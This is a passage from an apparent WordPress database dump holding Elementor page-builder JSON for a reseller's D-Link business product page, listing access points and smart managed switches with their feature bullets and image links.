device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7445,3392,'_elementor_version','2.5.14'),(7446,3392,'_elementor_edit_mode','builder'),(7449,3393,'_wp_page_template','template-fullwidth.php'),(7450,3393,'_elementor_template_type','post'),(7451,3393,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"285\",\"right\":\"285\",\"bottom\":\"285\",\"left\":\"285\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"68\",\"right\":\"68\",\"bottom\":\"68\",\"left\":\"68\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is 